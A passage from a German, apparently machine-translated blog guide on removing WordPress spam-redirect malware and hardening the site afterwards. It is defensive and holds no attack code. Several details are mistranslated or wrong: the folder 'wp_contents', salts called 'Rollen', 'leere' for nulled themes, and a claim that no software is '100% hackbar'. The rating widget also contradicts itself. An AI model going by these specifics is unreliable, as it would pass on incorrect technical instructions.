5. Laden Sie die bereinigten Dateien erneut

Nachdem Sie den Hack entfernt haben, müssen Sie Ihre Website wieder aufbauen. Verwenden Sie einen Dateimanager, um Dateien erneut hochzuladen, und phpMyAdmin auf cPanel oder VestaCP, um Ihre Website zu ersetzen.

Dies ähnelt stark dem manuellen Wiederherstellen einer Sicherung und bedeutet, dass Sie zunächst die vorhandenen Dateien und die Datenbank löschen müssen. Wenn Sie den Backup-Schritt zu Beginn versehentlich übersprungen haben, tun Sie es jetzt. Das Sichern Ihrer Website, auch einer gehackten, erspart Ihnen Ärger, wenn etwas schief geht.

6. Leeren Sie den Site-Cache

Nachdem Ihre bereinigte Website nun geladen ist, leeren Sie Ihren Cache. Der Cache speichert frühere Versionen Ihrer Seiten und Inhalte und zeigt sie Ihren Website-Besuchern an. Damit sich Ihre neu bereinigte Site wie erwartet verhält, müssen Sie den Cache leeren.

7. Überprüfen Sie alle Plugins und Themes

Das Traurige an Malware ist, dass sie sich fast überall verstecken kann. Da Sie so viel Zeit und Energie in die manuelle Bereinigung Ihrer Website investiert haben, lohnt es sich, sich ein paar zusätzliche Minuten Zeit zu nehmen, um sicherzustellen, dass Ihre Bemühungen ein Erfolg sind.

Ich empfehle Ihnen, hierfür FTP zu verwenden, da das Ändern der Website-Dateien viel Arbeit erfordert.

  • Deaktivieren Sie alle Ihre Plugins und Themes, indem Sie den Ordner „wp_contents“ in einen anderen Namen umbenennen.
  • Aktivieren Sie sie dann nacheinander und überprüfen Sie Ihre Website jedes Mal auf eine Weiterleitung.
  • Wenn es keine Probleme gibt, wissen Sie, dass die Plugins und Themes keine Schadsoftware enthalten.

Warum ich dringend davon abraten würde, Hacker-Weiterleitungen manuell zu entfernen

Sie fragen sich vielleicht, warum ich nicht empfehle, Hacks auf diese Weise zu löschen. Stellen Sie sich Hacks genauso vor wie eine Krankheit, etwa Krebs oder einen Knochenbruch.

Überlassen Sie die Behandlung dieser Krankheiten lieber Ärzten, die ausgebildete Fachkräfte mit umfangreicher Erfahrung in der Behandlung dieser Krankheiten sind. Untrainierte Menschen schaden mehr als sie nützen. Fragen Sie jeden Arzt, der sich mit einem schlecht verheilten Knochenbruch auseinandersetzen musste.

Beim manuellen Entfernen eines Hacks können einige Dinge schief gehen:

  • Schädliche Software kann sich an unerwartete Orte verbreiten und lässt sich nur schwer fehlerfrei entfernen.
  • Das Entfernen von Malware allein reicht nicht aus, wenn Schwachstellen und/oder Hintertüren nicht behoben werden.
  • Durch unsachgemäßes Löschen können manchmal andere Teile der Website beschädigt werden.
  • Die manuelle Durchsicht großer Websites (z. B. E-Commerce-Shops) ist sehr schwierig und zeitaufwändig.
  • Zeit ist von entscheidender Bedeutung, da Hacks mit der Zeit exponentiell schlimmer werden.
  • Möglicherweise können Sie nicht auf Ihre Website zugreifen, wenn der Hoster Ihr Konto gesperrt hat

Einfach ausgedrückt: Bei einer gehackten Website gibt es eine große Fehlerquote. Es besteht die sehr reale Gefahr, dass Sie aus diesem Prozess in einer schlechteren Situation hervorgehen, als Sie begonnen haben. Um Hacker-Skripte zu entfernen, verwenden Sie am besten ein gutes Sicherheits-Plugin.

Die Website wird in den Spam-Bereich weitergeleitet: Wie hat sich das auf meine Website ausgewirkt?

Websites sind komplexe Softwaremischungen, und im Kern ist keine Software auf dem 100% hackbar. Dies ist die Realität jeder Software, von den 8-Bit-Spielen vergangener Zeiten bis hin zu den riesigen Management-Informationssystemen, die von Banken verwendet werden.

Bei WordPress-Websites ist das nicht anders. Während die WordPress-Kerndateien am ehesten kugelsicher sind, kann man das nicht von Plugins und Themes sagen. Plugins und Themes fügen Websites dynamische Elemente, Funktionalität und Design hinzu, und eine Website ohne sie wäre zwar sicher, aber auch statisch und langweilig.

Hier ist eine Liste von Gründen, warum WordPress-Sites gehackt werden:

  1. Sicherheitslücken in Plugins und Themes;
  2. Schlechte Passwörter und kompromittierte Benutzerkonten;
  3. Hintertüren in nulled Themes und Plugins;
  4. XSS-Skript-Angriffe;
  5. Brute-Force-Angriffe mit Bots.

Wie bereits erwähnt, darf die Website-Sicherheit nicht auf die leichte Schulter genommen werden. Sie haben jetzt aus erster Hand erfahren, wie schwierig es ist, einen Hack zu beheben. Idealerweise sollten Sie daher über eine Strategie verfügen, um sicherzustellen, dass so etwas nicht noch einmal passiert.

Wie kann man WordPress-Redirect-Hacks in Zukunft verhindern?

Nachdem Sie nun eine saubere Website haben, besteht der nächste Schritt darin, zu verhindern, dass Ihre WordPress-Website in den Spam umgeleitet wird.

Hacks werden ständig wiederholt. Dies liegt in erster Linie daran, dass der Grund für den Hackerangriff auf Ihre Website nicht behoben werden konnte. Um ein erneutes Auftreten zu verhindern, müssen folgende Schritte unternommen werden:

1. Installieren Sie das Sicherheits-Plugin: Wählen Sie ein gutes Sicherheits-Plugin, das Hacks scannen, bereinigen und verhindern kann. Diese Plugins verfügen über eine integrierte Firewall, die schädlichen Datenverkehr proaktiv daran hindert, Ihre Website zu erreichen.
2. Ändern Sie alle Passwörter für Benutzer und Datenbank: Kompromittierte Benutzerkonten und leicht zu erratende Passwörter sind der zweite Grund für Website-Hacks.
3. Benutzerkonten zurücksetzen und überprüfen: Überprüfen Sie Benutzerkonten mit unnötigem Administratorzugriff und entfernen Sie diese.
4. Ändern Sie Rollen und Sicherheitsschlüssel: Rollen und Sicherheitsschlüssel sind lange Zeichenfolgen, die WordPress an Cookie-Anmeldedaten anhängt, um Benutzern zu helfen, sicher angemeldet zu bleiben. Sie können sie in Ihrer wp-config.php-Datei ändern, nachdem Sie den WordPress-Generator verwendet haben, um neue zu erhalten.
5. Achten Sie darauf, nur bewährte Plugins und Themes zu verwenden: Das habe ich schon einmal gesagt, aber es lohnt sich, es zu wiederholen. Verwenden Sie nur Plugins und Themes von vertrauenswürdigen Entwicklern. Diese Entwickler stellen Support und Updates bereit, die für die Sicherheit unglaublich wichtig sind. Auf keinen Fall sollten Sie leere Themes und Plugins verwenden. Was auch immer Sie sparen, Sie werden durch den unvermeidlichen Hack ein Vielfaches verlieren.
6. Stellen Sie sicher, dass Sie über SSL verfügenA: Idealerweise sollten Sie bereits über SSL auf Ihrer Website verfügen, der Vollständigkeit halber fügen wir es jedoch ein. SSL stellt sicher, dass die Kommunikation von und zur Website verschlüsselt ist. Auch Google treibt diese Änderung mit Nachdruck voran und Sie werden bald SEO-Strafen sehen, wenn Sie dies noch nicht getan haben, wenn SSL auf Ihrer Website nicht aktiviert ist.
7. Schützen Sie WordPress: Es gibt sicherheitsverschärfende Maßnahmen, die allgemein als „Härtung von WordPress“ bekannt sind. Ich möchte Sie warnen, nicht zu vergessen, die coolen Tipps im Internet zu befolgen. Einige davon funktionieren überhaupt nicht und beeinträchtigen Ihre Website und das Besuchererlebnis.
8. Halten Sie einen Sicherheitsplan/Sicherheitsmaßnahmen bereit, die regelmäßig durchgeführt werden müssen: Es reicht nicht aus, eine Sache nur einmal zu tun und sie dann zu vergessen. Überprüfen Sie zumindest regelmäßig die Benutzer und verlangen Sie ein Zurücksetzen des Passworts. Das Einrichten eines Aktivitätsprotokolls ist ebenfalls eine gute Idee, da es die Benutzeraktivität einfach und schnell verfolgen kann, was oft ein Frühwarnzeichen für eine gehackte Website sein kann.
9. Sie müssen auch alles aktualisieren.A: WordPress, Plugins und Themes und erstellen Sie regelmäßig Backups.

Welche Folgen haben böswillige Weiterleitungen?

Jeder Hack hat schreckliche Auswirkungen auf eine Website, und WordPress-Redirect-Malware ist da nicht anders. Hier sind nur einige der Möglichkeiten, wie sich Malware negativ auf Ihre Website und Ihr Unternehmen auswirken kann:

  • Verlust von Einkommenwenn Sie eine E-Commerce-Website oder eine Unternehmenswebsite haben.
  • Verlust des Markenwerts aufgrund der Weiterleitung von Besuchern auf illegale, betrügerische oder Spam-Websites.
  • Auswirkungen auf SEOweil Google gehackte Websites auf seinen Listen bestraft und eine gehackte Website markiert, sodass Besucher generell Angst haben, sie zu besuchen.
  • Datenleck Ihre Besucher und Ihre Website.

Es gibt noch viele weitere Möglichkeiten, wie Hacker Sachschäden verursachen können. Der entscheidende Faktor ist, schnell zu handeln und Malware so schnell wie möglich zu entfernen.

Abschluss

Die WordPress-Redirect-Hack-Malware erscheint von Zeit zu Zeit in einem neuen Avatar. Hacker und damit auch ihre Schadsoftware werden immer schlauer. WordPress-Websites sind für sie eine Fundgrube und der einzige Weg, sie zu schlagen, besteht darin, ihnen einen Schritt voraus zu sein.

Der beste Weg, Ihre WordPress-Website zu sichern, ist die Installation eines guten Sicherheits-Plugins, das auch über eine integrierte Firewall verfügt. Dies ist ohne Zweifel die beste Investition in die Sicherheit Ihrer Website.

Lesen dieses Artikels:

Danke fürs Lesen: SEO HELPER | NICOLA.TOP

Wie hilfreich war dieser Beitrag?

Klicke auf die Sterne um zu bewerten!

Durchschnittliche Bewertung 5 / 5. Anzahl Bewertungen: 543

Bisher keine Bewertungen! Sei der Erste, der diesen Beitrag bewertet.

Das könnte dich auch interessieren …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

девять − девять =